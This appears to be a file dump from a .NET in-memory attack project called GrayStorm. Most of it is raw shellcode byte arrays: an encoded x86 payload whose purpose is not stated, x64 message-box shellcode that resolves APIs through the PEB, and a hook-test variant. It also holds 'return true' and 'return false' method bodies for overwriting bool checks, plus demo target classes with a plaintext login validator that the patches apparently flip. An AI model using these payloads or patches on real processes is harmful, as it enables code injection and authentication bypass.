        0xd9, 0xe9, 0xd9, 0x74, 0x24, 0xf4, 0xbb, 0x0b, 0xc7, 0x22, 0xd6, 0x5e, 0x33, 0xc9, 0xb1,
        0x33, 0x31, 0x5e, 0x17, 0x03, 0x5e, 0x17, 0x83, 0xcd, 0xc3, 0xc0, 0x23, 0x2d, 0x23, 0x8d,
        0xcc, 0xcd, 0xb4, 0xee, 0x45, 0x28, 0x85, 0x3c, 0x31, 0x39, 0xb4, 0xf0, 0x31, 0x6f, 0x35,
        0x7a, 0x17, 0x9b, 0xce, 0x0e, 0xb0, 0xac, 0x67, 0xa4, 0xe6, 0x83, 0x78, 0x08, 0x27, 0x4f,
        0xba, 0x0a, 0xdb, 0x8d, 0xef, 0xec, 0xe2, 0x5e, 0xe2, 0xed, 0x23, 0x82, 0x0d, 0xbf, 0xfc,
        0xc9, 0xbc, 0x50, 0x88, 0x8f, 0x7c, 0x50, 0x5e, 0x84, 0x3d, 0x2a, 0xdb, 0x5a, 0xc9, 0x80,
        0xe2, 0x8a, 0x62, 0x9e, 0xad, 0x32, 0x08, 0xf8, 0x0d, 0x43, 0xdd, 0x1a, 0x71, 0x0a, 0x6a,
        0xe8, 0x01, 0x8d, 0xba, 0x20, 0xe9, 0xbc, 0x82, 0xef, 0xd4, 0x71, 0x0f, 0xf1, 0x11, 0xb5,
        0xf0, 0x84, 0x69, 0xc6, 0x8d, 0x9e, 0xa9, 0xb5, 0x49, 0x2a, 0x2c, 0x1d, 0x19, 0x8c, 0x94,
        0x9c, 0xce, 0x4b, 0x5e, 0x92, 0xbb, 0x18, 0x38, 0xb6, 0x3a, 0xcc, 0x32, 0xc2, 0xb7, 0xf3,
        0x94, 0x43, 0x83, 0xd7, 0x30, 0x08, 0x57, 0x79, 0x60, 0xf4, 0x36, 0x86, 0x72, 0x50, 0xe6,
        0x22, 0xf8, 0x72, 0xf3, 0x55, 0xa3, 0x18, 0x02, 0xd7, 0xd9, 0x65, 0x04, 0xe7, 0xe1, 0xc5,
        0x6d, 0xd6, 0x6a, 0x8a, 0xea, 0xe7, 0xb8, 0xef, 0x05, 0xa2, 0xe1, 0x59, 0x8e, 0x6b, 0x70,
        0xd8, 0xd3, 0x8b, 0xae, 0x1e, 0xea, 0x0f, 0x5b, 0xde, 0x09, 0x0f, 0x2e, 0xdb, 0x56, 0x97,
        0xc2, 0x91, 0xc7, 0x72, 0xe5, 0x06, 0xe7, 0x56, 0x86, 0xc9, 0x7b, 0x3a, 0x67, 0x6c, 0xfc,
        0xd9, 0x77
    };

    #endregion x86

    #region x64

    static public byte[] test64Bit = new byte[]
    {
        0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24,
        0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b,
        0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20,
        0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24, 0x20, 0xba, 0x8e, 0x4e,
        0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xeb, 0x34,
        0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc, 0x48, 0x89, 0xc1, 0xe8,
        0x56, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d, 0x31, 0xc9, 0xeb, 0x2c,
        0x41, 0x58, 0xeb, 0x3a, 0x5a, 0x48, 0x31, 0xc9, 0xff, 0xd3, 0xba, 0x70,
        0xcd, 0x3f, 0x2d, 0x4c, 0x89, 0xf9, 0xe8, 0x37, 0x00, 0x00, 0x00, 0x48,
        0x31, 0xc9, 0xff, 0xd0, 0xe8, 0xc7, 0xff, 0xff, 0xff, 0x75, 0x73, 0x65,
        0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00, 0xe8, 0xcf, 0xff, 0xff,
        0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6e,
        0x21, 0x00, 0xe8, 0xc1, 0xff, 0xff, 0xff, 0x30, 0x78, 0x64, 0x65, 0x61,
        0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89, 0xcd, 0x67, 0x41, 0x8b,
        0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88, 0x00, 0x00, 0x00, 0x45,
        0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67, 0x41, 0x8b, 0x5e, 0x20,
        0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff, 0xca, 0x67, 0x42, 0x8b,
        0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84,
        0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x39, 0xd7,
        0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44, 0x01, 0xeb, 0x31, 0xc9,
        0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41, 0x8b, 0x5e, 0x1c, 0x44,
        0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01, 0xe8, 0xc3
    };

    static public byte[] test64BitMessageBox = new byte[]
    {
        0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24,
        0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b,
        0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20,
        0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24,
        0x20, 0xba, 0x8e, 0x4e, 0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x68, 0x00,
        0x00, 0x00, 0xeb, 0x34, 0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc,
        0x48, 0x89, 0xc1, 0xe8, 0x56, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d,
        0x31, 0xc9, 0xeb, 0x2c, 0x41, 0x58, 0xeb, 0x3a, 0x5a, 0x48, 0x31, 0xc9,
        0xff, 0xd3, 0xba, 0x70, 0xcd, 0x3f, 0x2d, 0x4c, 0x89, 0xf9, 0xe8, 0x37,
        0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0xff, 0xd0, 0xe8, 0xc7, 0xff, 0xff,
        0xff, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00,
        0xe8, 0xcf, 0xff, 0xff, 0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73,
        0x20, 0x66, 0x75, 0x6e, 0x21, 0x00, 0xe8, 0xc1, 0xff, 0xff, 0xff, 0x30,
        0x78, 0x64, 0x65, 0x61, 0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89,
        0xcd, 0x67, 0x41, 0x8b, 0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88,
        0x00, 0x00, 0x00, 0x45, 0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67,
        0x41, 0x8b, 0x5e, 0x20, 0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff,
        0xca, 0x67, 0x42, 0x8b, 0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31,
        0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
        0xeb, 0xf4, 0x39, 0xd7, 0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44,
        0x01, 0xeb, 0x31, 0xc9, 0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41,
        0x8b, 0x5e, 0x1c, 0x44, 0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01,
        0xe8, 0xc3
    };

    // Sets rax to 1 and returns (x64 replacement body for a bool-returning method).
    static public byte[] returnTrue64 = new byte[]
    {
        0x48, 0x31, 0xc0, //xor rax, rax
        0x48, 0x83, 0xc0, 0x01, //add rax, 1
        0xc3 //ret
    };

    // Sets rax to 0 and returns.
    static public byte[] returnFalse64 = new byte[]
    {
        0x48, 0x31, 0xc0, //xor rax, rax
        0xc3 //ret
    };

    // Registered by payloadsList with indexToStartCleaning = 148.
    static public byte[] SixtyFourbitHookTest = new byte[]
    {
        0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24,
        0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b,
        0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20,
        0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24, 0x20, 0xba, 0x8e, 0x4e,
        0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x6c, 0x00, 0x00, 0x00, 0xeb, 0x38,
        0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc, 0x48, 0x89, 0xc1, 0xe8,
        0x5a, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d, 0x31, 0xc9, 0xeb, 0x42,
        0x41, 0x58, 0xeb, 0x2c, 0x5a, 0x48, 0x31, 0xc9, 0xff, 0xd3, 0x90, 0x90,
        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xc3, 0xe8, 0xc3, 0xff, 0xff,
        0xff, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00,
        0xe8, 0xcf, 0xff, 0xff, 0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73,
        0x20, 0x66, 0x75, 0x6e, 0x21, 0x00, 0xe8, 0xb9, 0xff, 0xff, 0xff, 0x30,
        0x78, 0x64, 0x65, 0x61, 0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89,
        0xcd, 0x67, 0x41, 0x8b, 0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88,
        0x00, 0x00, 0x00, 0x45, 0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67,
        0x41, 0x8b, 0x5e, 0x20, 0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff,
        0xca, 0x67, 0x42, 0x8b, 0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31,
        0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
        0xeb, 0xf4, 0x39, 0xd7, 0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44,
        0x01, 0xeb, 0x31, 0xc9, 0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41,
        0x8b, 0x5e, 0x1c, 0x44, 0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01,
        0xe8, 0xc3
    };

    #endregion x64
}
276 | }
277 |
278 |
--------------------------------------------------------------------------------
/testClass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 |
7 | namespace GrayStorm
8 | {
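/// <summary>
/// Minimal demo target: returnStatement() always yields false and trueOrFalse()
/// reports that result through a MessageBox ("True" / "False").
/// </summary>
class testClass
{
    /// <summary>Always returns false.</summary>
    public bool returnStatement()
    {
        return false;
    }

    /// <summary>Shows "True" when returnStatement() is true, otherwise "False".</summary>
    public void trueOrFalse()
    {
        // The unused local `int x;` of the original was dropped; it only produced a CS0168 warning.
        if (returnStatement())
            System.Windows.Forms.MessageBox.Show("True");
        else
            System.Windows.Forms.MessageBox.Show("False");
    }

}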
26 |
/// <summary>
/// Demo/test fixture: a trivial plaintext "login" check (presumably the method the
/// rest of the project patches to show a result flip). login() and loginStATIC()
/// call it with "lol" vs "lol2", so the unpatched result is always the "Failed" box.
/// NOTE: validateLogin compares the raw password with ordinary string equality.
/// A real credential check would compare a salted password hash (e.g. PBKDF2) using
/// a fixed-time comparison; this is kept as-is only because it is a test fixture.
/// </summary>
class abc
{
    //test function
    /// <summary>True when password equals savedPwd (ordinal string equality; null == null is true).</summary>
    public bool validateLogin(string password, string savedPwd)
    {
        if (password == savedPwd)
        {
            return true;
        }
        else
            return false;
    }

    /// <summary>Static twin of validateLogin with identical logic.</summary>
    public static bool validateLoginSTATIC(string password, string savedPwd)
    {
        if (password == savedPwd)
        {
            return true;
        }
        else
            return false;
    }

    /// <summary>Calls validateLoginSTATIC with fixed mismatching strings and shows the outcome.</summary>
    public static void loginStATIC()
    {
        if(validateLoginSTATIC("lol", "lol2"))
        {
            System.Windows.Forms.MessageBox.Show("Logged in");
        }
        else
            System.Windows.Forms.MessageBox.Show("Failed");
    }

    /// <summary>
    /// Calls validateLogin with fixed mismatching strings, shows the outcome, then
    /// shows the current managed stack trace in a second MessageBox.
    /// </summary>
    public void login()
    {
        if (validateLogin("lol", "lol2"))
        {
            System.Windows.Forms.MessageBox.Show("Logged in");
        }
        else
            System.Windows.Forms.MessageBox.Show("Failed");

        System.Diagnostics.StackTrace stackTrace = new System.Diagnostics.StackTrace ();
        System.Windows.Forms.MessageBox.Show(stackTrace.ToString());
    }


}
75 | }
76 |
77 |
78 |
79 |
80 |
81 |
--------------------------------------------------------------------------------